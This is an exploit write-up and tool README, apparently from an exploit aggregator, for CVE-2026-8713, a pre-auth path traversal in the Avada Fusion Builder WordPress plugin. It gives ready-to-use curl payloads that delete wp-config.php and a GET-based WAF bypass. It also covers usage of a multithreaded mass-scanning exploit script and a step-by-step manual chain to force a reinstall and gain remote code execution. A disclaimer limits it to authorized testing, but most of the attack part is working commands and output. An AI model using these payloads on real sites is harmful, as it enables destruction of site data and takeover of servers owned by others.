Share
## https://sploitus.com/exploit?id=6E4D26B8-DE2F-5FAB-85C9-D38C397BEE5F
CVE-2026-8713 โ€” Avada (Fusion) Builder WordPress Exploit
Pre-Auth Path Traversal โ†’ Arbitrary File Delete โ†’ Force Reinstall โ†’ RCE

---

## Overview

**CVE-2026-8713** is a CVSS 9.1 critical vulnerability in the **Avada (Fusion) Builder** plugin/theme for WordPress. The `maybe_delete_files()` function in the `Fusion_Form_DB_Entries` class constructs filesystem paths from attacker-controlled form entry values using simple string replacement โ€” without `realpath()` validation or directory containment checks.

An unauthenticated attacker submits a path traversal payload via the `fusion_form_submit_ajax` handler. When the `Fusion_Form_DB_Privacy` shutdown hook processes the entry with `privacy_expiration_action=delete`, the targeted file is removed from the server.

### Affected Versions

| Version | Status |
|---|---|
| Fusion Builder โ‰ค 3.15.3 | Vulnerable |
| Fusion Builder โ‰ฅ 3.15.4 | Patched |
| Avada theme (all) | Bundled plugin may be vulnerable |

> **Note:** The Avada theme version (7.x) differs from the Fusion Builder plugin version (3.x). The vulnerability is in the **plugin**, but the scanner detects both.

---

## Vulnerability Mechanism

### Root Cause

In `fusion-builder/inc/class-fusion-form-db-entries.php`, the `maybe_delete_files()` method resolves file paths using string replacement without containment validation:

```php
$file_path = str_replace($upload['url'], $upload['path'], $value);
// No realpath() check โ€” path traversal sequences pass through
unlink($file_path);
```

### Attack Chain

```
1. Attacker submits Avada form via wp_ajax_nopriv_fusion_form_submit_ajax
   โ†’ Path traversal: ../../wp-config.php
   โ†’ privacy_expiration_action = delete
   โ†’ privacy_expiration_interval = 0

2. WordPress shutdown hook fires Fusion_Form_DB_Privacy
   โ†’ Processes stored form entry
   โ†’ Calls maybe_delete_files() on attacker-controlled path
   โ†’ wp-config.php deleted

3. WordPress enters setup/install mode
   โ†’ Attacker connects site to malicious database
   โ†’ Full remote code execution
```

### Unauthenticated Access

The AJAX handler is registered with `wp_ajax_nopriv_`, making it accessible to unauthenticated users:

```
POST /wp-admin/admin-ajax.php
  action=fusion_form_submit_ajax
  form_id=
  privacy_expiration_action=delete
  fusion_privacy_expiration_interval=0
  fusion_form_field_=../../wp-config.php
```

### WAF Bypass

Many hosts block POST to `/wp-admin/admin-ajax.php`. WordPress accepts parameters via GET on this endpoint, providing a trivial bypass:

```
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=&privacy_expiration_action=delete&...
```

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt
```

---

## Usage

```bash
# Detection only (default โ€” no file deletion)
python cve_2026_8713.py -t target.com

# Mass detection
python cve_2026_8713.py -f targets.txt

# Exploit mode โ€” delete wp-config.php
python cve_2026_8713.py -t target.com --exploit

# Delete custom file
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"
```

### Arguments

```
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  --exploit         Enable file deletion (default: detection only)
  --delete PATH     Custom file path to delete (default: wp-config.php)
  -o, --output      Save results to file
  --threads         Workers (default: 20)
  -v, --verbose     Show detailed output
```

---

## Proof of Concept

### Detection Mode

```bash
$ python cve_2026_8713.py -f targets.txt
```

```
  CVE-2026-8713  Avada (Fusion) Builder  |  CVSS 9.1
  Mode: Detection  |  Targets: 521  |  Workers: 20
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

  [EXPLOIT]  target-vuln.com      1.2s  form #3  (AJAX open)
  [VULN]     target-waf.com       2.1s  form #1  (WAF blocked)
  [AVADA]    target-noform.com    0.5s  (no form found)
  [-]        target-noavada.com   0.3s

  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  Scan complete  |  Time: 45s
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  Targets        : 521
  Avada detected : 47
  Forms found    : 12
  Vulnerable     : 9
```

### Exploit Mode

```bash
$ python cve_2026_8713.py -t target.com --exploit -v
```

```
  CVE-2026-8713 โ€” Avada Builder Exploit
  CVSS 9.1 | Pre-Auth | Path Traversal โ†’ File Delete โ†’ RCE

    [+] Found Avada form: id=3
    [+] POST form_id=3: HTTP 403 (WAF blocked)
    [+] GET form_id=3: HTTP 200 (WAF bypassed)

  Host     : target.com
  Avada    : YES
  Form     : 3
  Deleted  : wp-config.php (force reinstall โ†’ RCE)
  Time     : 3.2s
```

### Manual Exploitation

**Step 1 โ€” Verify Avada**
```bash
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5
```

**Step 2 โ€” Find form ID**
```bash
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](\d+)'
```

**Step 3 โ€” Submit form with path traversal**
```bash
curl -sk -X POST \
  -d 'action=fusion_form_submit_ajax' \
  -d 'form_id=3' \
  -d 'privacy_expiration_action=delete' \
  -d 'fusion_privacy_expiration_interval=0' \
  -d 'fusion_form_field_x=../../wp-config.php' \
  'https://target.com/wp-admin/admin-ajax.php'
```

**Step 4 โ€” WAF Bypass (if POST blocked)**
```bash
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'
```

**Step 5 โ€” Verify & Exploit RCE**
```bash
# Site in install mode?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 โ†’ wp-config deleted โ†’ connect malicious DB โ†’ full RCE
```

---

## Disclaimer

> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse.

---

## References

| Resource | Link |
|---|---|
| IONIX Advisory | [ionix.io/threat-center/cve-2026-8713](https://www.ionix.io/threat-center/cve-2026-8713/) |
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-builder/avada-fusion-builder-3153-unauthenticated-arbitrary-file-deletion) |
| Patchstack | [patchstack.com](https://patchstack.com/database/wordpress/plugin/fusion-builder/) |
| NVD Entry | [CVE-2026-8713](https://nvd.nist.gov/vuln/detail/CVE-2026-8713) |

---


  This project is not affiliated with ThemeFusion or Avada.